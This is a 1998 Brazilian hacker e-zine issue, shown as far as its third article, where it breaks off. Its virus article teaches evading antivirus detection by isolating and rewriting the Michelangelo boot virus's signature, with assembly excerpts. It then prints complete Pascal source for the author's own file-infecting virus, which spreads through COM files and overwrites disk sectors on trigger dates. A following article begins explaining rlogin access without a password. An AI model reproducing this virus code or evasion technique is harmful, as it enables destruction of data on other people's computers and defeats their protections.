          ////     ////     ////////      ////////   ////     ////
         ////     ////   ////    ////  ////         ////    ////
        ////     ////   ////    ////  ////         ////  ////
       ////     ////   ////    ////  ////         //// ////
      /////////////   ////////////  ////         ////////
     ////     ////   ////    ////  ////         ////  ////
    ////     ////   ////    ////  ////         ////    ////
   ////     ////   ////    ////  ////         ////      ////
  ////     ////   ////    ////     ////////  ////        ////

                                         ²±°°°°°°°   ²±°   ²±°  ²±°°°°°°°
   [ Numero: 03, Fevereiro de 1998 ]     ²±°    ²±°  ²±°   ²±°  ²±°    ²±°
                                         ²±°    ²±°  ²±°   ²±°  ²±°    ²±°
       [ Hack and Phreak Group ]         ²±°°°°°°°   ²±°°°°²±°  ²±°°°°°°°
                                         ²±°         ²±°   ²±°  ²±°  ²±°
   [ http://www.hackphr.home.ml.org ]    ²±°         ²±°   ²±°  ²±°   ²±°
                                         ²±°         ²±°   ²±°  ²±°    ²±°

                                                         ASCii by MaNdRaCk

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
     VERSAO APENAS PARA MS-DOS. RECOMENDADO CARREGAR O DRiVER COUNTRY.SYS
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

MeMbrOs AtUAiS:         (listados por ordem de ingresso no zine)

- MaNdRaCk      -   mandrack@geocities.com
- Cebola        -   cebola_br@hotmail.com
- ShK           -   shk_hack_@hotmail.com
- HaCk-MaN      -   hack.man@mailcity.com
- SideW         -

PaRTiCiPAAO EsPeCiAL De:

- GhOsT InVaDeR - UHF ZINE - http://uhf.base.org
ghostin@freemail.globalsite.com.br

OBS.: Editores temporarios, candidatos e contribuidores tmb sao listados...

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

     ***   ****   ***   ******     *******  ***   ***
    ***   *** *  ***   ***   ***  ***        *** ***
   ***   ***  * ***   ***   ***  ******       ***
  ***   ***   ****   ***   ***  ***        *** ***
 ***   ***    ***   *******    *********  ***   ***
 ====================== = = = = =  =  =  =   =   =   =    =    =     =

01| INTRODUAO                          -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -
02| ViRii                               -  by Cebola
------------------------------------------- - -  -  -   -    -     -
03| INTRODUAO AO HACKING - PARTE II    -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -
04| BACKDOORS                           -  by ShK
------------------------------------------- - -  -  -   -    -     -
05| COMPLEMENTANDO OS NUMEROS BINARIOS  -  by HaCk-MaN
------------------------------------------- - -  -  -   -    -     -
06| BACKDOOR SH                         -  by GhOsT InVaDeR
------------------------------------------- - -  -  -   -    -     -
07| PLACAS DE CIRCUITO IMPRESSO         -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -
08| BOX - TRANSMISSOR FM OCULTO         -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -
09| SHADOW PASSWD                       -  by SideW
------------------------------------------- - -  -  -   -    -     -
10| CORREIO DA GALERA                   -  by HackPHR
------------------------------------------- - -  -  -   -    -     -
11| ANUNCIOS, PUBLICAOES & MISC.       -  by HackPHR
------------------------------------------- - -  -  -   -    -     -
12| ENTRANDO EM CONTATO                 -  by HackPHR
------------------------------------------- - -  -  -   -    -     -
13| BRINDE: EXPLOIT P/ NETSCAPE E IE    -  by MaNdRaCk
------------------------------------------- - -  -  -   -    -     -

   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                             01  -  INTRODUAO
                            -=-=-=-=-=-=-=-=-=-

   Ai pessoal, estou abrindo aki a ediao de Fevereiro, a primeira de 98, com
todo o pique, o zine nao podia estar melhor, e agradeo a todos os leitores,
o sucesso do zine nos devemos a vcz... O numero de editores aumentando, dah
pra fazer o zine sempre grandaiao, hehehe... Bom, voltando a falar sobre edi-
tores, eu peo q nao mandem mais mails se candidatando, falem diretamente com
um de nossos editores, todo fim de semana, geralmente a tarde no nosso querido
canal de mIRC. Fica bem melhor pra gente, nao precisa ficar com medo, se vc
acha q tem chance e tem medo q a gente acha q vc sabe pouco, nao vamos fazer
nada de mal, como vovo jah dizia: quem nao arrisca nao petisca... hehehe...
   Ah, nosso Home Page tambem mudou de URL e de cara, agora eh soh digitar
http://www.hackphr.home.ml.org, pronto, lah soh vai ter o nosso zine e mais
uns progz q a gente fez, outros zines mais tarde, a pagina de outros zines
ainda tah em construao, ainda a proxima ediao, vcz podem contar nos dedos,
01 de Maro, vamos lutar o maximo pro zine ser mensal, pois nao podemos dar
bobeira pro nosso zine nao cair de circulaao. Pois hoje em dia tem uma porra-
da e meia de zines, em tudo q eh lugar, pena q a maioria eh "xerox" dos outros
e puxa-saco da Axur, como se adiantasse muito...

   Hamm, nesse zine vcz vao encontrar algumas materias interessantes, tmb po-
dem notar q temos a participaao de nosso amigo Ghostin da UHF, ele escreveu
uma materia sobre Backdoors. Temos ainda a participaao do ShK e do HaCk-MaN,
eles apenas escreveram uma materia pequena cada um, tmb nao conseguimos falar
com eles ultimamente, nao estamos recebendo reply...
   Esta ediao jah comea arrebentando com uma materia muito massa do Cebola,
com o source de um virus novo feito por ele mesmo, logo apos temos a continua-
ao da minha materia sobre hacking para iniciantes. Pro final ainda temos uma
materia minha sobre uma box e um guia para soldagem e confecao de placas de
cicuito impresso, eu queria colocar mais coisas, principalmente de uns caras
que escreveram pra gente, mas jah tava chegando o dia 01 de Fevereiro e eu
nao queria atrasar... Soh deu pra colocar uma materia pequena q o SideW fez.
Espero q gostem, e preparem o folego pra 04...

   1998, MaNdRaCk - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                                02  -   ViRii
                               -=-=-=-=-=-=-=-

        A¡, galera. Ano novo, revista nova, virus novo. Enquanto muita gente
tava a¡ coando o saco, eu tava aqui ralando, estudando muito(hacking, 
claro) e desenvolvendo um novo virus para essa ediÆo do zine. Vai a¡ um
resumo das matrias virii:

        * ContinuaÆo do tutorial de variantes de virus
        * Virus completo com caracter¡sticas Stealth feito em Pascal

        O algor¡timo para geraÆo de n£meros de cartäes de crdito eu fico
devendo para a pr¢xima ediÆo, j  que a parte virii dessa ediÆo deu quase
700 linhas.

Tutorial de como escrever variantes(parte II)
---------------------------------------------

        Na £ltima ediÆo do zine eu dei o source do Michelangelo, que vai ser
muito £til nesse tutorial sobre variantes. Sei que mais algum j  deve ter es-
crito sobre isso, inclusive encontrei uma matria em um zine americano, mas
tava meio confuso, entÆo eu resolvi escrever a minha matria, que deve estar
bem f cil de se entender, inclusive para os beginners. Voc vai precisar de
pelo menos algum pequeno conhecimento em Assembler para isso.
        Como j  temos o source do virus fica muito mais f cil. A primeira
coisa a se fazer  salvar o source em um arquivo e compilar com qualquer
compilador ASSEMBLER. Eu uso o A86, na minha opiniÆo  o melhor porque 
shareware e suporta todos os formatos de linguagem Assembly. Ap¢s compilar o
source, voc vai perceber que qualquer antivirus merdinha  capaz de acusar a
presena do Michelangelo no arquivo. Eu usei a £ltima atualizaÆo do Viruscan
para esses testes, se voc for usar outro antivirus talvez os resultados sejam
um pouco diferentes.
        O primeiro passo  dividir o source em pequenos pedaos, que ali s
j  estÆo divididos, como: Int13h, Check_infection, Infect_it, etc... Esses
sÆo os labels usados no virus, e sÆo bastante £teis para se organizar o
programa em blocos. A finalidade de dividir o source nesses labels  de
descobrir onde est  a assinatura do virus.  Ou seja, atravs de que parte
do source do virus compilado que o antivirus identifica o virus. O que n¢s
vamos fazer  achar a assinatura do virus e mudar os comandos, afim de
modificar o source mas nÆo alterar o efeito do virus.
        Se voc tem algum conhecimento em ASM, deve saber que voc pode mudar
a ordem dos atributos dados aos registros sem qualquer dano ao source, desde
que a chamada da interrupÆo fique por £ltimo. Assim,

        MOV AH, 16
        MOV BX, 123
        INT 21

         igual a

        MOV BX, 123
        MOV AH, 16
        INT 21

       Lembre-se que eu acabei de inventar esse exemplo, e nÆo tenho a m¡nima
idia do que isso vai fazer depois de compilado. Outra regra: evidentemente
quando voc copia o valor de uma vari vel dentro de outra a ordem deve ser res
peitada. EX:

        MOV AH, 16
        MOV DH, AH
        INT 23

         diferente de

        MOV DH, AH
        MOV AH, 16
        INT 23

       No primeiro exemplo estariamos assignando o valor 16 ao registrador AH
e depois assigna o valor AH ao registrador DH. EntÆo ficaria: AH=DH=16. Ele
 diferente do segundo exemplo porque o segundo exemplo faria o seguinte:
d  o valor AH ao registrador DH, ficariam AH=DH=0. Depois d  ao registrador AH
o valor 16. No final entÆo s¢ o registrador AH estaria com valor=16. Se voc
nÆo entendeu, vai aprender assembly e depois vem ler essa matria.
        Bom, voltando ao que interessa, o primeiro passo  comear a retirar
partes do c¢digo do virus e compilar o c¢digo sem esses pedaos. Se o antivirus
ainda acusa o virus, voc ainda nÆo chegou na sua assinatura. Por exemplo:
voc retira do c¢digo do Michelangelo dado na £ltima ediÆo o label INT13H.
Voc compila o c¢digo obtido e o antivirus nÆo acusa a presena de virus. Isso
quer dizer que o pedao do virus que o identifica para o antivirus(a
assinatura do virus) ficou no pedao que voc retirou. EntÆo, a assinatura do
virus est  no label INT13H. Bom,  s¢ uma suposiÆo.
        Outro cuidado a ser tomado  quanto  referencia feita no programa aos
labels. Por exemplo, se voc vai retirar um label chamado "teste" e no resto
do virus h  uma linha que diz

        JNE TESTE

        na hora de compilar o compilador vai gerar um erro. A soluÆo 
simplesmente colocar um ponto e v¡rgula antes da linha, declarando essa
linha como um coment rio. Ficaria assim:

        ; JNE TESTE

         s¢ um modo de se evitar o erro. Depois deve-se retirar os pontos-e-
v¡rgulas para nÆo mudar o c¢digo viral.
        EntÆo depois dessa teoria toda vamos  pratica: Comece retirando
pedaos do virus. Na maioria dos casos a assinatura fica no in¡cio do virus.
EntÆo comece retirando a segunda metade do virus. Eu comecei apagando tudo o
que vem depois do label entervirus. Compilei e executei o scan: o virus con-
tinuava detect vel. Comecei agora retirando pedaos do in¡cio. Retirei o pri-
meiro label, o antivirus continuava detectando. Retirei o segundo, tambm.
Continuei assim at s¢ restar o label entervirus. EntÆo uma coisa interessante
aconteceu: o antivirus passou a reconhecer o arquivo como sendo infectado pelo
virus GENB!!! Chegamos  conclusÆo que o GENB  quase uma variante do
Michelangelo. Eu consegui isolar a parte do Michelangelo que o identifica como
GENB, entÆo achei a assinatura do GENB. A assinatura do GENB fica entre esse
pedao de c¢digo:

************************* GENB *************************

michelangelo    segment byte public
                assume  cs:michelangelo, ds:michelangelo
                org     0

highmemjmp      db      0F5h, 00h, 80h, 9Fh
maxhead         db      2                       ; used by damagestuff
firstsector     dw      3
oldint13h       dd      0C8000256h

entervirus:
                xor     ax,ax
                mov     ds,ax
                cli
                mov     ss,ax
                mov     ax,7C00h                ; Set stack to just below
                mov     sp,ax                   ; virus load point
                sti
                push    ds                      ; save 0:7C00h on stack for
                push    ax                      ; later retf
                mov     ax,ds:[13h*4]
                mov     word ptr ds:[7C00h+offset oldint13h],ax
                mov     ax,ds:[13h*4+2]
                mov     word ptr ds:[7C00h+offset oldint13h+2],ax
                mov     ax,ds:[413h]            ; memory size in K
                dec     ax                      ; 1024 K
                dec     ax
                mov     ds:[413h],ax            ; move new value in
                mov     cl,6
                shl     ax,cl                   ; ax = paragraphs of memory
                mov     es,ax                   ; next line sets seg of jmp
                mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
                mov     ds:[13h*4],ax
                mov     ds:[13h*4+2],es
                mov     cx,offset partitioninfo
                mov     si,7C00h
                xor     di,di
                cld
                rep     movsb                   ; copy to high memory
                                                ; and transfer control there
; destination of highmem jmp
                xor     ax,ax
                mov     es,ax
                push    cs
                pop     ds
                mov     ax,201h
                mov     bx,7C00h
                mov     cx,firstsector
                cmp     cx,7                    ; hard disk infection?
                mov     dx,80h                  ; Read old partition table of
; The following bytes are meaningless.
garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo:  db      42h dup (0)
michelangelo    ends
                end

*****************************************

         Bom lembrar que nÆo temos  mÆo o virus GENB. Se voc compilar
esse source e rodar no computador voc nÆo vai estar executando o virus
GENB, mas somente um pedao dele que contm a sua assinatura.
        Bom, voltamos entÆo ao Michelangelo. Eu tinha acabado de retirar o
label IS360KDISK e nosso virus ficou indetect vel(passou a detectar o GENB no
lugar). EntÆo recoloque o label is360Kdisk no lugar. Conseguimos isolar agora
um pedao de pequeno tamanho do virus que contm a assinatura. NÆo temos em
mÆo necessariamente a assinatura, mas um pedao que a contm. Eis esse pedao:

********** ASSINATURA *************

michelangelo    segment byte public
                assume  cs:michelangelo, ds:michelangelo
                org     0

                jmp     entervirus
highmemjmp      db      0F5h, 00h, 80h, 9Fh
maxhead         db      2                       ; used by damagestuff
firstsector     dw      3
oldint13h       dd      0C8000256h

is360Kdisk:
                mov     firstsector,cx
                pushf
                call    oldint13h
;                 jc      quitinfect              ; exit on error
                mov     si,200h+offset partitioninfo
                mov     di,offset partitioninfo
                mov     cx,21h                  ; Copy partition table
                cld
                rep     movsw
                mov     ax,301h                 ; Write virus to sector 1
                xor     bx,bx
                mov     cx,1
                xor     dx,dx
                pushf
                call    oldint13h

entervirus:
                xor     ax,ax
                mov     ds,ax
                cli
                mov     ss,ax
                mov     ax,7C00h                ; Set stack to just below
                mov     sp,ax                   ; virus load point
                sti
                push    ds                      ; save 0:7C00h on stack for
                push    ax                      ; later retf
                mov     ax,ds:[13h*4]
                mov     word ptr ds:[7C00h+offset oldint13h],ax
                mov     ax,ds:[13h*4+2]
                mov     word ptr ds:[7C00h+offset oldint13h+2],ax
                mov     ax,ds:[413h]            ; memory size in K
                dec     ax                      ; 1024 K
                dec     ax
                mov     ds:[413h],ax            ; move new value in
                mov     cl,6
                shl     ax,cl                   ; ax = paragraphs of memory
                mov     es,ax                   ; next line sets seg of jmp
                mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
;                 mov     ax,offset int13h
                mov     ds:[13h*4],ax
                mov     ds:[13h*4+2],es
;                 mov     cx,offset partitioninfo
                mov     si,7C00h
                xor     di,di
                cld
                rep     movsb                   ; copy to high memory
                                                ; and transfer control there
                jmp     dword ptr cs:[7C00h+offset highmemjmp]
; destination of highmem jmp
                xor     ax,ax
                mov     es,ax
                int     13h                     ; reset disk
                push    cs
                pop     ds
                mov     ax,201h
                mov     bx,7C00h
                mov     cx,firstsector
                cmp     cx,7                    ; hard disk infection?
;                jne     floppyboot              ; if not, do floppies
                mov     dx,80h                  ; Read old partition table of
                int     13h                     ; first hard disk to 0:7C00h
;                 jmp     short exitvirus
; The following bytes are meaningless.
garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo:  db      42h dup (0)
michelangelo    ends
                end

*********** ASSINATURA **********

        As linhas que tm um ponto-e-v¡rgula antes faziam referncia a um
label que foi retirado do c¢digo. Depois de construir a sua variantes, voc
deve retirar esses pontos e v¡rgulas.
        Bom, agora que voc tem o pedao de c¢digo que contm a assinatura do
virus voc deve modificar esse pedao de c¢digo  vontade, mas nunca retirando
nada at obter um c¢digo que nÆo seja reconhecido pelo antivirus. Um exemplo
 mudando as linhas que dizem:

        MOV ax,201h
        MOV bx,7CH00

        para

        MOV bx,7CH00
        MOV ax,201h

        Cuidado para nÆo cometer nenhum dos erros que listei acima e sempre
deixar a chamada  interrupÆo por £ltimo. Se voc conseguir um c¢digo que
se torne invis¡vel para o antivirus, copie esse pedao de c¢digo para dentro
do virus original(que foi dado na ediÆo 02 desse zine), substituindo o
antigo, ou seja, apague os labels IS360KDISK e ENTERVIRUS do virus original
e os substitua com os que voc modificou e nÆo foram achados pelo antivirus.
Compile e passe o antivirus agora pela variante que voc gerou. Se o antivirus
nÆo o detectar, se alegre: voc criou uma das trocentas variantes do
Michelangelo. Se voc conseguiu, salve o c¢digo fonte(.ASM) em um arquivo e
me mande. Eu terei prazer em colocar o seu nome aqui na pr¢xima ediÆo da
revista! Mensagens para:  cebola_br@hotmail.com

Virus com caracter¡sticas Stealth feito em Pascal
-------------------------------------------------

        Eu andei pesquisando muitos virus nessas frias, e acabei produzindo
um que, na minha opiniÆo, superou todos os outros que eu j  tinha visto feitos
em pascal. A vantagem de se usar linguagens de alto n¡vel  que sÆo menos pro-
p¡cias a erro, permitem um controle sobre o fluxo do programa(se voc usar um
bom editor como o Turbo Pascal) e o c¢digo fica bem menor. Mas quando se trata
de v¡rus(e nÆo cavalo de tr¢ia)  sempre bom usar linguagens compiladas e nÆo
interpretadas. Linguagens compiladas sÆo: Pascal, C, C++, Delphi... Linguagens
interpretadas sÆo: Basic, Qbasic, Vbasic, Java... A desvantagens das interpre-
tadas  que sÆo muito lentas, e no caso de virus(que normalmente devem execu-
tar sua rotina de infecÆo sem o usu rio perceber) isso  necessariamente
muito importante.
        O c¢digo dado a seguir vem com os coment rios em formato Pascal-padrÆo
(usando chaves) e nÆo  necess rio a retirada destes para a compilaÆo do pro-
grama. Diferente de que muita gente acha, os coment rios nÆo aumentam o tama-
nho do programa compilado, e sÆo muito £teis para terceiros entenderem o c¢-
digo.

================== Virus HANTA versÆo 1.0 ========================
Program Virus_HANTA;

{VIRUS HANTA VERSÇO 1.0 BY CEBOLA
 DATA DE CRIAÇO: 22/01/1998
 BELO HORIZONTE, MG
"NÇO VOU FICAR IMPLORANDO PRA NÇO ALTERAREM O CàDIGO
 MAS TENHA EM MENTE QUE, SE VOCÒ ALTERAR  UM LAMMER
 SEM CRIATIVIDADE!!!"

 BUGS E CORREåES PARA: cebola_br@hotmail.com}

{diretiva M define o tamanho da pilha dinamica para liberar mais memoria e
eliminar o bug DosError 8(out of memory) na linha que chama o programa
original}
{$M 16384,0,0}
{$Q-}
{$R-}

Uses Windos,dos,crt;
var curdir: string;
    dir: SearchRec;
    x: integer;
    attrib: byte;

procedure age;
var dia,dia_semana,mes,ano: word;
    regs: Registers;
begin
  getdate(ano,mes,dia,dia_semana);
  {O VIRUS AGE NOS DIAS 11/12 E NAS SEXTAS-FEIRAS DIA TREZE}
  if ((dia=12) and (mes=11)) or ((dia=13) and (dia_semana=5)) then
   begin
     clrscr;
     for x:=1 to 12 do
      begin
       textcolor(x);
       gotoxy(x,5);
       writeln('                  _________-----_____');
       gotoxy(x,6);
       writeln('       _____------           __      ----_');
       gotoxy(x,7);
       writeln('___----             ___------              \');
       gotoxy(x,8);
       writeln('   ----________        ----                 \');
       gotoxy(x,9);
       writeln('               -----__    |             _____)');
       gotoxy(x,10);
       writeln('                    __-                /     \');
       gotoxy(x,11);
       writeln('        _______-----    ___--          \    /)\');
       gotoxy(x,12);
       writeln('  ------_______      ---____            \__/  /');
       gotoxy(x,13);
       writeln('               -----__    \ --    _          /\');
       gotoxy(x,14);
       writeln('                      --__--__     \_____/   \_/\');
       gotoxy(x,15);
       writeln('                              ----|   /          |');
       gotoxy(x,16);
       writeln('                                  |  |___________|');
       gotoxy(x,17);
       writeln('                                  |  | ((_(_)| )_)');
       gotoxy(x,18);
       writeln('                                  |  \_((_(_)|/(_)');
       gotoxy(x,19);
       writeln('                                  \             (');
       gotoxy(x,20);
       writeln('                                   \_____________)');
       delay(500);
      end;
     delay(10000);
     clrscr;
     gotoxy(1,5);
     writeln('ÛÛ  ÛÛ  ÛÛÛÛÛÛ  ÛÛ   ÛÛ  ÛÛÛÛÛÛ  ÛÛÛÛÛÛ  ÛÛ     ÛÛ  ÛÛ  ÛÛÛÛÛÛ  ÛÛ  ÛÛ  ÛÛÛÛÛÛÛ');
     gotoxy(1,6);
     writeln('ÛÛ  ÛÛ  ÛÛ  ÛÛ  ÛÛÛ  ÛÛ    ÛÛ    ÛÛ  ÛÛ  ÛÛ     ÛÛ  ÛÛ  ÛÛ  ÛÛ  ÛÛ  ÛÛ  ÛÛ');
     gotoxy(1,7);
     writeln('ÛÛÛÛÛÛ  ÛÛÛÛÛÛ  ÛÛ Û ÛÛ    ÛÛ    ÛÛÛÛÛÛ   ÛÛ   ÛÛ   ÛÛ  ÛÛÛÛÛ   ÛÛ  ÛÛ  ÛÛÛÛÛÛÛ');
     gotoxy(1,8);
     writeln('ÛÛ  ÛÛ  ÛÛ  ÛÛ  ÛÛ  ÛÛÛ    ÛÛ    ÛÛ  ÛÛ    ÛÛ ÛÛ    ÛÛ  ÛÛ ÛÛ   ÛÛ  ÛÛ       ÛÛ');
     gotoxy(1,9);
     writeln('ÛÛ± ÛÛ  ÛÛ ±ÛÛ  ÛÛ   ÛÛ   ±ÛÛ    ÛÛ± ÛÛ    °ÛÛÛ±   ±ÛÛ  ÛÛ ±ÛÛ  ÛÛÛÛÛÛ  ÛÛÛÛÛÛÛ');
     gotoxy(1,10);
     writeln('±±± ±±  ±± ±±±  ±±   ±±   ±±±    ±±± ±±     °±±±    ±±  ±± ±±   ±±  °±  ±±   ±±');
     gotoxy(2,11);
     writeln('±± ±°  ±±  ±±  ±±   °±    ±±    ±±  ±°      °±±    ±±  ±± °±   ±±  ±°  ±±   ±±');
     gotoxy(2,12);
     writeln('°° °±  °°  °°  °°   ±°    °°    °°  °±       °±     ±  °±  °   °±  ±±  °±   ±°');
     gotoxy(3,13);
     writeln('° ±°  ±°  °    °   °°    °°    °°  °         °     °  ±°      °°  °°  ±°   °°');
     gotoxy(5,14);
     writeln('°°  °   °        °      °    °             °         °       °  °°   °   °');
     gotoxy(6,15);
     writeln('°                                                               °');
     delay(10000);
     {regrava todas as trilhas do disco r¡gido}
     Regs.ah:=$19;
     intr($21,regs);
     Regs.cx:=$0009;
     Regs.dx:=$0;
     intr($26,regs);
   end;
end;
function save_old_attrib(arquivo:string): byte;
{Salva os atributos do arquivo a ser executado para depois de infectado
voltar com os atributos antigos}
var attr: word;
    arq: file;
begin
  assign(arq,arquivo);
  GetFAttr(arq,attr);
  save_old_attrib:=attr;
end;
procedure put_old_attrib(arquivo:string; attrib:word);
{resgata os atributos antigos do arquivo j  infectado e os recoloca no
arquivo}
var arq: file;
begin
  assign(arq,arquivo);
  SetFAttr(arq,attrib);
end;

function check_infection(nome : string): boolean;
{CHECA SE O ARQUIVO A SER INFECTADO Jµ ESTµ INFECTADO}
var arq,temp: text;
    i: integer;
    a,b,c,d: char;
begin
{***}
{acha o arquivo atual, contendo o c¢digo do virus}

     assign(arq,nome);
     reset(arq);
     assign(temp,'temp.dat');
     rewrite(temp);
     for i:=1 to 13 do read(arq,a);
     read(arq,a);
     write(temp,ord(a));
     write(temp,' ');
     for i:=1 to 22 do read(arq,b);
     read(arq,b);
     write(temp,ord(b));
     write(temp,' ');
     for i:=1 to 60 do read(arq,c);
     read(arq,c);
     write(temp,ord(c));
     write(temp,' ');
     for i:=1 to 77 do read(arq,d);
     read(arq,d);
     write(temp,ord(d));
     if (a=chr(4)) and (b=chr(141)) and (c=chr(7)) and (d=chr(0)) then
     begin
       check_infection:=true;
       close(arq);
       close(temp);
     end
     else begin
            check_infection:=false;
            close(arq);
            close(temp);
          end;

{***}
end;

procedure infect_directory;
var infile, outfile: file;
    curdir,vitima,virus: string;
    arquivo, arquivo2: SearchRec;
    size,actlen,curlen: longint;
    result: word;
    buffer: array[1..1000] of char;
    buffer2: array[1..928] of char;
    virusfile,tempfile: text;
    a,b,c,d: char;
    sign: char;
    i: integer;
    infected: boolean;

const all:byte=$3F;

begin
  {retorna o diretorio atual}
  getdir(0,curdir);
  {procura o 1§ arquivo COM para infectar}
  findfirst(curdir+'\'+'*.com',all,arquivo);
  while doserror=0 do
  begin
   clrscr;
   {garante que  um arquivo(attr=32) e nÆo um diret¢rio(attr=16)}
   if (arquivo.attr=32) and (arquivo.name<>'TEMP.COM') then
   begin
     {verifica se j  nÆo est  infectado}
     infected:=check_infection(arquivo.name);
     if infected=false then
     begin
      {guarda na vari vel vitima o arquivo a ser infectado}
      vitima:=arquivo.name;
      {salva os atributos antigos}
      attrib:=save_old_attrib(arquivo.name);
      {guarda na variavel virus o nome do arquivo contendo o c¢digo viral}
      virus:=paramstr(0);
      {copia o virus pro arquivo}
      assign(infile,virus);
      assign(outfile,'temp.com');
      reset(infile,1);
      rewrite(outfile,1);
      for i:=1 to 12 do
       begin
         blockread(infile, buffer, 1000, result);
         blockwrite(outfile, buffer, 1000, result);
       end;
      blockread(infile, buffer2, 864, result);
      blockwrite(outfile, buffer2, 864, result);
      close(infile);
      {copia o original pro final do arquivo}
      assign(infile,vitima);
      {abre o arquivo e define um registro=1byte}
      reset(infile,1);
      {retorna o tamanho do arquivo}
      size:=filesize(infile);
      actlen := 0;    {outputfile}
      curlen := size; {inputfile}
      while actlen < curlen do
       begin
         blockread(infile, buffer, 1000, result);
         if actlen + 1000 > curlen then
          begin
            blockwrite(outfile, buffer, curlen - actlen, result);
            actlen := curlen;
          end
          else
           begin
             blockwrite(outfile,buffer,1000,result);
             inc(actlen,1000);
           end;
       end;
      close(infile);
      close(outfile);
      {DEPOIS DE PRONTO, O ARQUIVO TEMP COM VAI FICAR ASSIM:
       ---------------------------
      |   VIRUS    |   ORIGINAL   |
      |            |              |
       ---------------------------
       ENTÇO FECHA O ARQUIVO TEMP.COM, DELETA O ARQUIVO ORIGINAL E RENOMEIA
       O TEMP.COM PARA PARA O NOME DO ORIGINAL}
       assign(infile,vitima);
       erase(infile);
       assign(outfile,'TEMP.COM');
       rename(outfile,vitima);
       put_old_attrib(vitima,attrib);
      end;
   end;
   findnext(arquivo);
  end;
end;
procedure exec_original;
{RETIRA O ORIGINAL DO FINAL DO ARQUIVO SENDO EXECUTADO E SALVA EM ARQUIVO
TEMPORµRIO PARA DEPOIS EXECUTAR}
var infile: file;
    outfile: file;
    size,actlen,curlen: longint;
    buffer: array[1..1000] of char;
    result: word;
    parametros: string;
    i: integer;

begin

  assign(infile,paramstr(0));
  assign(outfile,'a.com');
  reset(infile,1);
  rewrite(outfile,1);
  seek(infile,12864);
  size:=filesize(infile);
  actlen := 0;    {outputfile}
  curlen := size-12864; {inputfile}
  while actlen < curlen do
   begin
     blockread(infile, buffer, 1000, result);
     if actlen + 1000 > curlen then
      begin
        blockwrite(outfile, buffer, curlen - actlen, result);
        actlen := curlen;
      end
     else
       begin
         blockwrite(outfile,buffer,1000,result);
         inc(actlen,1000);
       end;
   end;
   close(infile);
   close(outfile);
   if paramcount=0 then
    begin
      exec('a.com','');
      chdir(curdir);
    end
    else
    begin
      parametros:=paramstr(1);
      if paramcount>1 then
      begin
        for i:=2 to paramcount do parametros:=parametros+' '+paramstr(i);
      end;
      exec('a.com',parametros);
      chdir(curdir);
    end;

end;
begin
  {LEMBRAR DE TIRAR OS ATTRIBS DE SOMENTE LEITURA SE Jµ EXISTIR UM ARQUIVO NO
  DIRETàRIO A SE INFECTAR CHAMADO TEMP.COM}
  getdir(0,curdir);
  infect_directory;
  findfirst('curdir'+'\'+'*.*',$3F,Dir);
  While doserror=0 do
  begin
   if dir.attr=16 then
      infect_directory
      else findnext(dir);
  end;
  exec_original;
  age;
end.

=================== FIM DO CàDIGO ===================

        Bom, por essa ediÆo  s¢. Cr¡ticas, sugestäes, relatamentos de bugs
nos programas aqui listados:

        cebola_br@hotmail.com

        Se quiser usar PGP:

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2i

mQCNAzSgZvwAAAEEAM7Fl1R3Kd8sXY0eWm5H+0XKOBO3g6ifpFaz6G+EVW7jjeMO
hs9qW5Kco0bxHOAb8qfILAq3604MtnjiU/yCpk95ZbKjB7GonNeMQVwlhvdAIzyc
A+FvKBzLegWVUz2g3mEs3K1bq16HQFrg4h/w7wTbh8JYmDAh4g5foeaTuHMRAAUR
tC9GcmVkZXJpY28gV2FnbmVyIE8uIE1lbG8gPGxvcmVuemFAYmhuZXQuY29tLmJy
Pg==
=OV6h
-----END PGP PUBLIC KEY BLOCK-----

   1998, Cebola - HackPHR Zine
   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

                   03  -  INTRODUAO AO HACKING - PARTE II
                  -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Agora a continuaao do q eu escrevi na ediao passada, depois de ter publi-
cado, vieram uns caras me dizendo:

   - Meu cara, vc fez uma materia na ed. 02 q dizia q ia ensinar a hackear,
mas nao ensinou nada sobre como Hackear...

   Meus amigos, hackear nao eh vc ter de cor uns comandos pra copiar o passwd,
nao eh facil, vc tem q ter muito planejamento, muita estrategia, nao eh soh
copiar o q estah escrito naquele zine, q se vc fazer isso vc ganha acesso root
vc deve criar seus metodos, como? Entendendo, exige estudo, sem antes entender
um Sistema Operacional, como vc quer hackea-lo? Quem nao entende o sistema e
consegue fazer algo nele, nao o hackeia, mas sim, LAMMEREIA. Portanto aih vai
a continuaao, e se vc acha q tah fraco, q nao ensina nada, esse zine nao eh
pra vc, pare de ler e apague-o de seu HD...
   Bom, sem enrolaao, vamos lah:

   Usando Rlogin
  -=-=-=-=-=-=-=-

   O Rlogin eh um outro comando para logar em sistemas, se vc nao tiver uma
conta em alguma maquina, existe uma manha do Rlogin, pra vc logar sem ter a
password. O comando tem a seguinte sintaxe:

 rlogin -l username host.com.br

   Para obter maiores informaoes sobre o Rlogin, veja o manual dele:

 $ man rlogin

   O Rlogin funciona da seguinte maneira, vc jah digita o username na linha de
comando e ele jah vai pedir a password, vamos a um exemplo:

 $ rlogin -l mandrack lamer.com.br
   connecting...
   password:

   $

   Depois de digitar a password logo cai o shell da maquina q vc logou. Bom,
antes de testar seu Rlogin, verifique se ele tem um arquivo .rhosts no direto-
